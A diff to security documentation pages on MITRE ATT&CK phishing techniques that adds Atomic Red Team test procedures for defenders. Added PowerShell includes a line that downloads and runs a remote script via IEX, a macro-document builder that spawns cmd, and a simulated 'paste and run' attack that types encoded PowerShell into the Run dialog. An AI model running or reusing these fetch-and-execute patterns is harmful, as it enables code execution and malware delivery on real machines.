@@ -100,4 +102,5 @@ Block unknown devices and accessories by endpoint security configuration and mon
100
102
  - [Aleks Weapons Nov 2015](https://www.youtube.com/watch?v=lDvf4ScWbcQ)
101
103
  - [McMillan Pwn March 2012](https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/)
102
104
  - [Frisk DMA August 2016](https://www.youtube.com/watch?v=fXthwl6ShOg)
105
+ - [Atomic Red Team - T1200](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1200)
103
106
  - [MITRE ATT&CK - T1200](https://attack.mitre.org/techniques/T1200)
@@ -68,13 +68,50 @@ There are many options for the attachment such as Microsoft Office documents, ex
68
68
 
69
69
  ## How to Test
70
70
 
71
- ### Identify Attack Surface
71
+ ### Atomic Red Team Tests
72
72
 
73
- Determine if the target environment is susceptible to Spearphishing Attachment by examining the target platforms (Linux, macOS, Windows).
73
+ The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
74
74
 
75
- ### Assess Existing Defenses
75
+ ### Atomic Test 1: Download Macro-Enabled Phishing Attachment
76
76
 
77
- Review whether mitigations for T1566.001 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
77
+ This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file.
78
+ The file "PhishingAttachment.xlsm" is downloaded to the %temp% directory.
79
+
80
+ **Supported Platforms:** windows
81
+
82
+ ```powershell
83
+ $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
84
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
85
+ Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm
86
+ ```
87
+
88
+ ### Atomic Test 2: Word spawned a command shell and used an IP address in the command line
89
+
90
+ Word spawning a command prompt then running a command with an IP address in the command line is an indicator of malicious activity.
91
+ Upon execution, CMD will be launched and ping 8.8.8.8.
92
+
93
+ **Supported Platforms:** windows
94
+
95
+ ```powershell
96
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
97
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
98
+ $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
99
+ Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
100
+ ```
101
+
102
+ **Dependencies:**
103
+ - Microsoft #{ms_product} must be installed
104
+
105
+
106
+ ### Manual Testing
107
+
108
+ If Atomic Red Team tests are not applicable, manually verify the technique by:
109
+
110
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Spearphishing Attachment by examining the target platforms (Linux, macOS, Windows).
111
+
112
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1566.001 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
113
+
114
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
78
115
 
79
116
  ## Remediation Guide
80
117
 
@@ -124,4 +161,5 @@ Block unknown or unused attachments by default that should not be transmitted ov
124
161
  - [Unit 42 DarkHydrus July 2018](https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/)
125
162
  - [Microsoft Anti Spoofing](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide)
126
163
  - [Elastic - Koadiac Detection with EQL](https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql)
164
+ - [Atomic Red Team - T1566.001](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566.001)
127
165
  - [MITRE ATT&CK - T1566.001](https://attack.mitre.org/techniques/T1566/001)
@@ -83,13 +83,57 @@ Similarly, malicious links may also target device-based authorization, such as O
83
83
 
84
84
  ## How to Test
85
85
 
86
- ### Identify Attack Surface
86
+ ### Atomic Red Team Tests
87
87
 
88
- Determine if the target environment is susceptible to Spearphishing Link by examining the target platforms (Identity Provider, Linux, macOS).
88
+ The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
89
89
 
90
- ### Assess Existing Defenses
90
+ ### Atomic Test 1: Paste and run technique
91
91
 
92
- Review whether mitigations for T1566.002 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
92
+ Tests the **Paste and Run** technique, where users are tricked into running
93
+ malicious PowerShell commands by automating the Win+R command to open the
94
+ Run dialog and input `encoded PowerShell to execute calc.exe.`
95
+
96
+ - [Fake CAPTCHA Campaign](https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf)
97
+ - [From Clipboard to Compromise](https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn)
98
+
99
+ **Supported Platforms:** windows
100
+
101
+ ```powershell
102
+ # Add user32.dll for keybd_event
103
+ Add-Type @"
104
+ using System;
105
+ using System.Runtime.InteropServices;
106
+ public class K {
107
+ [DllImport("user32.dll")]
108
+ public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, UIntPtr dwExtraInfo);
109
+ }
110
+ "@
111
+
112
+ # Virtual key codes
113
+ $VK_LWIN, $VK_R, $KEYDOWN, $KEYUP = 0x5B, 0x52, 0x0000, 0x0002
114
+
115
+ # Open Run dialog (Win+R)
116
+ [K]::keybd_event($VK_LWIN, 0, $KEYDOWN, [UIntPtr]::Zero)
117
+ [K]::keybd_event($VK_R, 0, $KEYDOWN, [UIntPtr]::Zero)
118
+ [K]::keybd_event($VK_R, 0, $KEYUP, [UIntPtr]::Zero)
119
+ [K]::keybd_event($VK_LWIN, 0, $KEYUP, [UIntPtr]::Zero)
120
+
121
+ # Short delay for Run dialog
122
+ Start-Sleep -Milliseconds 500
123
+ Add-Type -AssemblyName System.Windows.Forms
124
+ [System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")
125
+ ```
126
+
127
+
128
+ ### Manual Testing
129
+
130
+ If Atomic Red Team tests are not applicable, manually verify the technique by:
131
+
132
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Spearphishing Link by examining the target platforms (Identity Provider, Linux, macOS).
133
+
134
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1566.002 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
135
+
136
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
93
137
 
94
138
  ## Remediation Guide
95
139
 
@@ -140,4 +184,5 @@ Users can be trained to identify social engineering techniques and spearphishing
140
184
  - [Mandiant URL Obfuscation 2023](https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse)
141
185
  - [Optiv Device Code Phishing 2021](https://www.optiv.com/insights/source-zero/blog/microsoft-365-oauth-device-code-flow-and-phishing)
142
186
  - [SecureWorks Device Code Phishing 2021](https://www.secureworks.com/blog/oauths-device-code-flow-abused-in-phishing-attacks)
187
+ - [Atomic Red Team - T1566.002](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566.002)
143
188
  - [MITRE ATT&CK - T1566.002](https://attack.mitre.org/techniques/T1566/002)
@@ -70,13 +70,15 @@ A common example is to build rapport with a target via social media, then send c
70
70
 
71
71
  ## How to Test
72
72
 
73
- ### Identify Attack Surface
73
+ ### Manual Testing
74
74
 
75
- Determine if the target environment is susceptible to Spearphishing via Service by examining the target platforms (Linux, macOS, Windows).
75
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Spearphishing via Service by examining the target platforms (Linux, macOS, Windows).
76
76
 
77
- ### Assess Existing Defenses
77
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1566.003 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
78
78
 
79
- Review whether mitigations for T1566.003 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
79
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
80
+
81
+ > **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
80
82
 
81
83
  ## Remediation Guide
82
84
 
@@ -117,4 +119,5 @@ Implement auditing and logging for interactions with third-party messaging servi
117
119
  ## References
118
120
 
119
121
  - [Lookout Dark Caracal Jan 2018](https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf)
122
+ - [Atomic Red Team - T1566.003](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566.003)
120
123
  - [MITRE ATT&CK - T1566.003](https://attack.mitre.org/techniques/T1566/003)
@@ -73,13 +73,15 @@ Adversaries may also combine voice phishing with Multi-Factor Authentication Req
73
73
 
74
74
  ## How to Test
75
75
 
76
- ### Identify Attack Surface
76
+ ### Manual Testing
77
77
 
78
- Determine if the target environment is susceptible to Spearphishing Voice by examining the target platforms (Linux, macOS, Windows).
78
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Spearphishing Voice by examining the target platforms (Linux, macOS, Windows).
79
79
 
80
- ### Assess Existing Defenses
80
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1566.004 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
81
81
 
82
- Review whether mitigations for T1566.004 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
82
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
83
+
84
+ > **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
83
85
 
84
86
  ## Remediation Guide
85
87
 
@@ -111,4 +113,5 @@ Users can be trained to identify and report social engineering techniques and sp
111
113
  - [Unit42 Luna Moth](https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/)
112
114
  - [sygnia Luna Month](https://blog.sygnia.co/luna-moth-false-subscription-scams)
113
115
  - [Proofpoint Vishing](https://www.proofpoint.com/us/threat-reference/vishing)
116
+ - [Atomic Red Team - T1566.004](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566.004)
114
117
  - [MITRE ATT&CK - T1566.004](https://attack.mitre.org/techniques/T1566/004)
@@ -76,13 +76,15 @@ Victims may also receive phishing messages that instruct them to call a phone nu
76
76
 
77
77
  ## How to Test
78
78
 
79
- ### Identify Attack Surface
79
+ ### Manual Testing
80
80
 
81
- Determine if the target environment is susceptible to Phishing by examining the target platforms (Identity Provider, Linux, macOS).
81
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Phishing by examining the target platforms (Identity Provider, Linux, macOS).
82
82
 
83
- ### Assess Existing Defenses
83
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1566 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
84
84
 
85
- Review whether mitigations for T1566 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
85
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
86
+
87
+ > **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
86
88
 
87
89
  ## Remediation Guide
88
90
 
@@ -135,4 +137,5 @@ Users can be trained to identify social engineering techniques and phishing emai
135
137
  - [sygnia Luna Month](https://blog.sygnia.co/luna-moth-false-subscription-scams)
136
138
  - [Proofpoint-spoof](https://www.proofpoint.com/us/threat-reference/email-spoofing)
137
139
  - [Palo Alto Unit 42 VBA Infostealer 2014](https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/)
140
+ - [Atomic Red Team - T1566](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566)
138
141
  - [MITRE ATT&CK - T1566](https://attack.mitre.org/techniques/T1566)